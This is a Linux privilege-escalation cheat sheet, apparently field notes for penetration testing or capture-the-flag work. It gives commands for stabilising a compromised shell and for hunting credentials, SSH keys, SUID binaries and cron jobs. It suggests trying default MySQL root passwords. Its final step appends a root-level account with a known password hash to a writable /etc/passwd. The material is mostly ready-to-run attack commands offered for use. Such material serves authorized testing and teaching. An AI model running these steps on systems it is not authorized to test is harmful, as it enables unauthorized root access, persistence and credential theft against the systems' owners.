Privilege Escalation
Based on g0tmilk’s Guide to Linux Privilege Escalation + additional field notes.
Step 1: Upgrade Your Shell
Make your shell more stable & interactive:
python -c 'import pty; pty.spawn("/bin/bash")'
python3 -c 'import pty; pty.spawn("/bin/bash")'
export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/tmp
export TERM=xterm-256color
alias ll='ls -lsaht --color=auto'
# Background and fix terminal
Ctrl + Z
stty raw -echo; fg; reset
stty columns 200 rows 200Step 2: Enumeration – System Context
Capabilities & Tooling
which gcc
which cc
which python
which perl
which wget
which curl
which fetch
which nc
which ncat
which nc.traditional
which socatCompilation / System Info
file /bin/bash
uname -a
cat /etc/*-release
cat /etc/issueArch & Kernel
file /bin/bash
uname -aStep 3: User Context
Are we a real user?
sudo -l
ls -lsaht /etc/sudoers
groups <user>
envUsers & homes:
cd /home/ && ls -lsahtStep 4: Credentials & Configs
Check for web creds:
cd /var/www/html/ && ls -lsahtCheck /etc/ for unusual configs:
ls -lsaht /etc/
ls -lsaht /etc/ | grep -i '\.conf'
ls -lsaht /etc/ | grep -i '\.secret'SSH keys:
ls -lsaR /home/Other dirs of interest:
ls -lsaht /var/lib/
ls -lsaht /var/db/
ls -lsaht /opt/
ls -lsaht /tmp/
ls -lsaht /var/tmp/
ls -lsaht /dev/shm/Step 5: Escalation Primitives
SUID / GUID
find / -perm -u=s -type f 2>/dev/null
find / -perm -g=s -type f 2>/dev/nullCheck exploitation paths: GTFOBins
File Capabilities
getcap -r / 2>/dev/nullReference: Linux File Capabilities
Step 6: Process & Cron Monitoring
Running Processes
ps aux | grep -i root --color=autoNetwork
netstat -antup
netstat -tunlpCron Jobs
crontab -u root -l
cat /etc/crontab
ls /etc/cron.*Process Monitoring (pspy)
# On attacker machine:
cd /var/tmp/
# Transfer pspy
chmod 755 pspy64
./pspy64Step 7: Databases
Check for MySQL root creds:
mysql -uroot -p
# Try common passwords:
# root, toor, (empty)Step 8: File Transfers
Check what’s available:
which wget
which curl
which nc
which fetch
ls -lsaht /bin/ | grep -i 'ftp'Step 9: NFS
Check for exports:
cat /etc/exports👉 Look for no_root_squash → Attacking NFS Shares
Step 10: Persistence / Living on Host
Writable locations:
/var/tmp//tmp//dev/shm/
Check mounts:
cat /etc/fstabStep 11: Local Port Forwards
If vulnerable services are only on 127.0.0.1:
Use
meterpreterport forwarding.
Step 12: Direct Root via /etc/passwd
/etc/passwdIf writable:
openssl passwd -1 i<3hacking
# Example output: $1$/UTMXpPC$Wrv6PM4eRHhB1/m1P.t9l.
echo 'siren:$1$/UTMXpPC$Wrv6PM4eRHhB1/m1P.t9l.:0:0:siren:/home/siren:/bin/bash' >> /etc/passwd
su siren
idStep 13: Miscellaneous
Mail:
cd /var/mail/ cd /var/spool/mail/ ls -lsahtFiles by specific user (ex: bob):
find / -user bob 2>/dev/null
Tools
Last updated